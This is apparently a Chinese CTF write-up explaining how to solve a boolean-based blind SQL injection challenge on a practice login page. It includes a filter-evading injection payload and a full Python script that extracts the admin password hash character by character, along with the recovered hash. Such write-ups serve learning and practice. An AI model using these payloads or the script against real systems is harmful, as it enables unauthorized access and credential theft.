[CTF]基於布林的SQL盲注
阿新 • • 發佈:2020-12-26
文章目錄
前言
[CTF學習]基於布林的SQL盲注
一、題目
提 示: 基於布林的SQL盲注
描 述: sql注入
訪問題目,又是一個web login登陸介面,根據提示可以大概猜測是一個sql post注入題。
二、解題步驟
1.bp抓包
POST /index.php HTTP/1.1 Host: 114.67.246.176:10965 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://114.67.246.176:10965/ Cookie: PHPSESSID=j4u9u18ei1r7serqv1vhg9km34 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 79 username=admin&password=123 #當username=admin時提示password error #可知使用者名稱為 admin #對username進行注入時,發現<>=都被過濾了,不過or沒有被過濾 #我這邊使用username=a'or(1) or(0)%23 進行sql注入判斷 #將使用者名稱故意輸錯來獲得回顯判斷
構造payload
username=admi'or((ascii(substr((select(password))from(1)))-48))%23&password=123
2、python指令碼
import requests import time url = "http://pandarking.ctf:10965/index.php" headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE' } with requests.session() as s: database = "passwd:" s.keep_alive = False s.adapters.DEFAULT_RETRIES = 5 for i in range(1,32): for j in range(48,128): sql = 'admi\'or((ascii(substr((select(password))from({0})))-{1}))--\''.format(i,j) data = {'username':sql,'password':"123"} try: res = s.post(url,data=data,timeout=5,headers=headers) except: time.sleep(2) res = s.post(url,data=data,timeout=5,headers=headers) if 'username does not exist' in res.text: database += chr(j) print(database) break res.close() #得到 passwd:4dcc88f8f1bc05e7c2ad1a60288481a
3、登陸後臺得到flag
謝謝觀看